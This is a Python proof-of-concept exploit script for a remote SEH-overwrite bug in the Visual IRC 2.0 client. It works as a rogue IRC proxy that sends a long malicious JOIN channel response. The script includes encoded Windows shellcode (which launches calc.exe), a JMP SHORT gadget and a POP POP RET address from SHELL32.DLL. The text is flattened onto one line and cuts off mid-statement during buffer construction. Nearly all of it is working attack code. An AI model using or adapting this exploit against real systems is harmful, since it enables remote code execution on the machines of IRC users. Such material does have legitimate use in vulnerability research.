#!/usr/bin/python # ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit # Bug discovered by Krystian Kloskowski (h07) # Tested on Visual IRC 2.0 / 2k SP4 Polish # Shellcode type: Windows Execute Command (calc.exe) # How stuff works ? .. # # [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server] # [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server] # # Details: # "#channel :" + "A" * 4116 # 0x41414141 Pointer to next SEH record # 0x41414141 SE handler ## from thread import start_new_thread from struct import pack from string import find from string import join from socket import * LEN_RECV = 65536 in_addr = '0.0.0.0' # local address in_port = 6667 # local port out_addr = '192.168.0.2' # address of IRC server out_port = 6667 # port of IRC server shellcode = ( "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4") NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish) buf = "A" * 4108 buf += pack("